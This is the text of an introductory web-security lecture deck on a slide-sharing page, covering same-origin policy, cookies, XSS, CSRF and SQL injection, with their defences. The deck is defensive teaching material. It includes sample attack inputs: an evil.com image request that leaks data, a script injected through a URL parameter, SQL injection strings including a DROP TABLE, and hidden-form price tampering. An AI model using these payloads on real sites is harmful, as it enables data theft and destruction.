web security
play

Web Security Presented by Amanda Lam, content from CSE 484/M 584 - PowerPoint PPT Presentation

Sep 17, 2022 •425 likes •785 views

Web Security Presented by Amanda Lam, content from CSE 484/M 584 Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Ada Lerner, John Manferdelli, John Mitchell, Yoshi Kohno, Franziska Roesner, Vitaly Shmatikov, Bennet Yee, and many others for

  1. Web Security Presented by Amanda Lam, content from CSE 484/M 584 Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Ada Lerner, John Manferdelli, John Mitchell, Yoshi Kohno, Franziska Roesner, Vitaly Shmatikov, Bennet Yee, and many others for sample slides and materials.

  2. Disclaimer: Vulnerabilities shown in this presentation still exist in implementation of some systems in production, please don’t go around attacking sites with this knowledge!

  3. Web applications How do we display How do we keep content in a safe session information manner? secure? How do we keep information stored in the backend secure?

  4. Web applications Web browser Web sessions, sandbox, same origin cross site scripting, policy cross site request forgery, injection

  5. Web Browser Security

  6. Will be loading content from any The Browser source on the internet. How do we protect ourselves from malicious sites and content?

  7. Browser sandbox When running scripts from various places, what should be protected? ● Local system ● Other websites on the browser Solution: ● Browser can’t access files, OS, network, etc. directly ● Make tabs and some elements different processes

  8. Same-origin policy Want to also protect/isolate web content from one another. Example: We are using http://www.example.com. What can this access? Example from Wikipedia Why do we care about same origin policy?

  9. Web Sessions

  10. How to persist state information? Sites may want to keep track of certain information. How might you encode the following? ● A term for a search engine ● # of times someone has guessed wrongly in hangman ● A user’s login and password

  11. How to persist state information? Sites may want to keep track of certain information. How might you encode the following? ● A term for a search engine Pass through URL: “https://duckduckgo.com/?q=vegemite” ● # of times someone has guessed wrongly in hangman ● A user’s login and password

  12. How to persist state information? Sites may want to keep track of certain information. How might you encode the following? ● A term for a search engine Pass through URL: “https://duckduckgo.com/?q=vegemite” ● # of times someone has guessed wrongly in hangman Hidden form: <input type="hidden" name="num_tries" value="<?php print $num_tries?>"> ● A user’s login and password

  13. URL encoding is not secure ...login?username=meep&password=vegemite Eavesdroppers can see URLs Can also easily modify the request

  14. Hidden forms are not secure What might be an issue with this? <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl"> Black Leather purse with leather straps <BR>Price: $20.00<BR> <INPUT TYPE=HIDDEN NAME=name VALUE="Black leather purse"> <INPUT TYPE=HIDDEN NAME=price VALUE="20.00"> Change this value to 2.00 - bargain shopping! <INPUT TYPE=HIDDEN NAME=sh VALUE="1"> <INPUT TYPE=HIDDEN NAME=img VALUE="purse.jpg"> <INPUT TYPE=HIDDEN NAME=custom1 VALUE="Black leather purse with leather straps"> <INPUT TYPE=SUBMIT NAME="add" VALUE="Put in Shopping Cart"> </FORM> Don’t use hidden forms for secure information!

  15. How to persist state information? Sites may want to keep track of certain information. How might you encode the following? ● A term for a search engine Pass through url: “https://duckduckgo.com/?q=vegemite” ● # of times someone has guessed wrongly in hangman Hidden form: <input type="hidden" name="num_tries" value="<?php print $num_tries?>"> ● A user’s login and password Store as a cookie!

  16. Cookies ● Servers can use cookies to store state on a client. ○ When session starts, server comptes an authenticator and places on the browser in the form of a cookie. ○ Server uses cookie to tell who is using the site

  17. Same origin policy protects cookies Websites can only read/receive cookies from the same domain. ● Can’t steal login token for another site! How can an adversary get around same origin policy?

  18. How can we get around same origin policy? While websites can’t access information on other sites, a page can send information to any site. Can use this to send out secrets. ● Example: Leaking information via image: src = “http://evil.com/evil.jpg? Request to evil.jpg with extra_information extra_information is made Forcing user to visit malicious url with information encoded gets around protections against accessing cookies from other origins.

  19. Common Web Vulnerabilities and Attacks

  20. A survey of different vulnerabilities ● Cross Site Scripting (XSS) ○ Reflected XSS Stored XSS ○ ● Cross Site Request Forgery (CSRF) ● Injection SQL Injection (revisited) ○

  21. Echoing / “Reflecting” User Input A classic mistake in server side applications is to directly print user input. For example, printing a greeting: ● URL: htttp://www.naive.com/hello.php?name=Vegemite PHP: echo “Welcome ” . $_GET[‘name’]; ● ● Output: Welcome Vegemite Server expects only a name, and prints the name in the page source. But can receive scripts instead.

  22. Reflected XSS 1. Encode a script in the url of an honest website http://naive.com/hello.php?name= 1. <script>alert("Vegemite”)%3B<%2Fscript> 1. D 2. Script is printed out on the page & runs when loaded: 2. d 3. Trick victim to visiting the encoded url 4. Script runs on the victim’s browser. ??? I’m not Vegemite

  23. XSS Workflow

  24. Dangers of XSS The script is executed as if it originated from that website. The script can then: ● show bogus information, ● request sensitive data, ● control form fields on this page and linked pages, ● leak information, ● cause user’s browser to attack other websites This gets around the restrictions of same origin policy.

  25. Stored XSS An example: Twitter Worm - visit an infected profile, get infected

  26. Preventing XSS Never trust user input, should pre-process before doing anything with it. Need to encode HTML to prevent it from running. ● Use a good escaping library a. OWASP ESAPI (Enterprise Security API) b. Microsoft’s AntiXSS c. Other companies may have their own suites ● PHP’s htmlspecialchars(String) will replace all special chars with their HTML code Ex: ‘ → &#039; // “ → &quot; // & → &amp; a.

  27. Cross Site Request Forgery Fake a form to send to a server under the guise of the victim.

  28. Impact of CSRF Can make requests on the user’s behalf! Hijack sessions by changing login info! Login to the attacker’s account! And so on

  29. Preventing CSRF Make it harder to pass off as the victim. ● Add a secret token for server to validate ○ Generate a secret token for the user session when form is loaded ○ Works due to same origin policy ■ Attacker can’t read the legitimate form, cannot fake a valid secret token. ● Validate the referrer Server checks who is referring the request ○ ■ Valid referrer: http://www.facebook.com/home.php ■ Invalid referrer: http://www.evil.com/attack.html

  30. Injection Main concept: Inject additional behavior into a page, query, etc. ● XSS is a common type of injection SQL injection: ● SQL application uses untrusted data in this SQL call ○ String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; ○ Similarly, in other frameworks: Query HQLQuery= session.createQuery("FROM accounts WHERE custID='" + request.getParameter("id") + "'"); If attacker sets id to ‘ or ‘1’ = ‘1, then we get ○ SELECT * FROM accounts WHERE custID='' or '1' = '1'"; ○ Result: Return all records in database!

  31. SQL Injection Cont. ● Again, SQL application uses untrusted data in this SQL call String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; ● What if user set id to ‘); DROP TABLE accounts;?

  32. Preventing Injection Comes down to filtering input. Fortunately, solutions against injection are already in most frameworks. ● For SQL: ○ Use prepare statements (only executes one command at a time) ○ Disallow execution of unexpected statements ○ Whitelist-based validation- Define what is expected ○ Use LIMIT to prevent mass disclosure of records ○ See OWASP Cheat Sheet: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat _Sheet

  33. Summary Web browser level ● Protect the local system by sandboxing the browser ● Same origin policy prevents websites from accessing each other Web application level Can store state information in sessions (url encoded, hidden form, cookies) ● ● If we don’t validate user input, many possible ways to abuse system ● Cross site scripting, cross site request forgery, injection ● Use APIs to filter user input

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

What is network security? Friends and enemies: Alice, Bob, Trudy What is network security?

What is network security? Friends and enemies: Alice, Bob, Trudy What is network security?

Network security Network security Foundations: what is security? cryptography Network Security Network Security authentication message integrity key distribution and certification Security in practice: Srinidhi Varadarajan

332 views • 6 slides
Security Security as term, Possible Security violations Authentication Criteria for

Security Security as term, Possible Security violations Authentication Criteria for

BS1 WS19/20 topic-based slides Security Security as term, Possible Security violations Authentication Criteria for Trust in Computer Systems Three hearts of Windows Security DACLs A Look at Security System is secure if

988 views • 20 slides
CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC410/611: Security Security Security Attacks Security Threats Crypto

CPSC 410 / 611 : Operating Systems CPSC410/611: Security Security Security Attacks Security Threats Crypto Authentication Examples SSL Security Threats Breach of confidentiality unauthorized access to

458 views • 18 slides
Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security

Biometrics and Security Biometrics and Security Biometrics and Security Biometrics and Security WS 06/07 Seminar Prof. Dr.-Ing. Jana Dittmann &amp; Dr.-Ing. Claus Vielhauer with support from Tobias Scheidat

419 views • 16 slides
1 X.800 Security Services X.800 Security Services X.800 Security Services Data integrity

1 X.800 Security Services X.800 Security Services X.800 Security Services Data integrity

Course Overview Course Requirements EECS 498-7/8 Cryptography and Network Security: www.citi.umich.edu/u/honey/security Principles and Practice (Third Edition) Computer Security Monday &amp; Friday, 9:00 10:30 William Stallings

670 views • 19 slides
A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security

A (re)introduction to Spring Security Agenda Before Spring Security: Acegi security Introducing Spring Security View layer security Whats coming in Spring Security 3 E-mail: craig@habuma.com Blog: http://www.springloaded.info

452 views • 19 slides
Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security

Network Security Network Security Srinidhi Varadarajan Network security Network security Foundations: what is security? cryptography authentication message integrity key distribution and certification Security in practice:

634 views • 36 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CSCE Intro to Computer Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies Security

472 views • 20 slides
SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY

SECURITY TESTING Towards a safer web world AGENDA 1. 3 WS OF SECURITY TESTING 2. SECURITY TESTING CONCEPTS 3. SECURITY TESTING TYPES 4. TOP 10 SECURITY RISKS Few Security Breaches Date: 2013-14 September 2016, while in negotiations to

404 views • 18 slides
Security Security with Distributed Systems Why Security? The need for security mechanisms in

Security Security with Distributed Systems Why Security? The need for security mechanisms in

Security Security with Distributed Systems Why Security? The need for security mechanisms in distributed systems arises from the desire to share resources Resources must be protected against unauthorized access, as enemies (attackers)

1.16k views • 67 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CPSC 410/611 Operating Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies

419 views • 19 slides
International and Global Security 1 Peer Discussion What is security? 2 International

International and Global Security 1 Peer Discussion What is security? 2 International

International and Global Security 1 Peer Discussion What is security? 2 International Security What is security? Freedom from threats to core values? Contestation over referent object: Individual? State? System? How is security achieved?

715 views • 11 slides
Security 101 Definition of Information Security Information security is the protection of

Security 101 Definition of Information Security Information security is the protection of

Computing Services Information Security Office Security 101 Definition of Information Security Information security is the protection of information and systems from unauthorized access, disclosure, modification, destruction or disruption. The

469 views • 22 slides
Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety

Security Update Security Plans Our Security plans are For Official Use Only, Safety Sensitive Information Not for public or media release F.S. 119.071. Required by law, rule and regulation: Homeland Security Directive 5 and 8.

393 views • 11 slides
Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the computing world, and are parallel to even older problems outside computing Required level of security is always related to what you protect

237 views • 23 slides
Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn

Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn

ITS335 Intro. to Security Concepts Threats, Attacks, Assets Introduction to Security Comm. Security Strategy Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 2

965 views • 34 slides
CSC 6991 Topics in Computer Security Fengwei Zhang Wayne State University CSC 6991 Topics in

CSC 6991 Topics in Computer Security Fengwei Zhang Wayne State University CSC 6991 Topics in

CSC 6991 Topics in Computer Security Fengwei Zhang Wayne State University CSC 6991 Topics in Computer Security 1 Who Am I? Fengwei Zhang Assistant Professor of Computer Science Office: Maccabees Building, Room 14109.3 Email:

453 views • 17 slides
OpenBSDs new httpd AsiaBSDCon 2015 Reyk Flter (reyk@openbsd.org)

OpenBSDs new httpd AsiaBSDCon 2015 Reyk Flter (reyk@openbsd.org)

I n t ro d u c i n g OpenBSDs new httpd AsiaBSDCon 2015 Reyk Flter (reyk@openbsd.org) ESDENERA NETWORKS GmbH Why do we need a web server in base? Serve the OpenBSD page. Why do we need a web server

264 views • 22 slides
RAMCloud: Scalable High-Perform ance Storage Entirely in DRAM John Ousterhout, David Mazires,

RAMCloud: Scalable High-Perform ance Storage Entirely in DRAM John Ousterhout, David Mazires,

RAMCloud: Scalable High-Perform ance Storage Entirely in DRAM John Ousterhout, David Mazires, and Mendel Rosenblum Stanford University http://www.stanford.edu/~ouster/cgi-bin/papers/ramcloud.pdf Motivation: Latency at Scale Traditional

646 views • 5 slides
CDBG-DR Key Concepts 2020 CDBG-DR and CDBG-MIT Webinar Series Webinar Welcome &amp; Overview

CDBG-DR Key Concepts 2020 CDBG-DR and CDBG-MIT Webinar Series Webinar Welcome &amp; Overview

CDBG-DR Key Concepts 2020 CDBG-DR and CDBG-MIT Webinar Series Webinar Welcome &amp; Overview Welcome! This webinar is part of a series of several webinars for CDBG-DR grantees and their partners on various critical topics essential for

1.05k views • 48 slides
What is SELinux trying to tell me? The 4 key causes of SELinux errors. SELinux Problem

What is SELinux trying to tell me? The 4 key causes of SELinux errors. SELinux Problem

What is SELinux trying to tell me? The 4 key causes of SELinux errors. SELinux Problem Solutions 1.SELinux == Labeling 2.SELinux Needs to Know 3.SELinux Policy/Apps can have bugs. 4.You could be COMPROMISED!!!! SELinux == Labeling Every

611 views • 11 slides
Commission on Journals 2011 Using the Status System David Hoare Systems Developer IUCr Update

Commission on Journals 2011 Using the Status System David Hoare Systems Developer IUCr Update

Commission on Journals 2011 Using the Status System David Hoare Systems Developer IUCr Update your World Directory entry. Update your World Directory entry. Update e-mail details and alerts. Update your World Directory entry. Update

697 views • 49 slides
Rise Silver A Product Need &amp; User $2.5B 970k 71.4% U.S. oven market Wall oven shipments,

Rise Silver A Product Need &amp; User $2.5B 970k 71.4% U.S. oven market Wall oven shipments,

Rise Silver A Product Need &amp; User $2.5B 970k 71.4% U.S. oven market Wall oven shipments, Percent of testers that size, 2018 [1] 2019 (predicted) [2] would potentially purchase Rise Product Benchmarking [3] [4] Regular Racks Easy

491 views • 7 slides
Procurement Overview State Agency Responsibilities Monitoring Training Guidance S

Procurement Overview State Agency Responsibilities Monitoring Training Guidance S

Procurement Overview State Agency Responsibilities Monitoring Training Guidance S tate Agency Monitoring Training Guidance State of Louisiana https:/ / cnp.doe.louisiana.gov/ index.asp USDA/ FNS https:/ / www.fns.usda.gov/

426 views • 16 slides

More recommend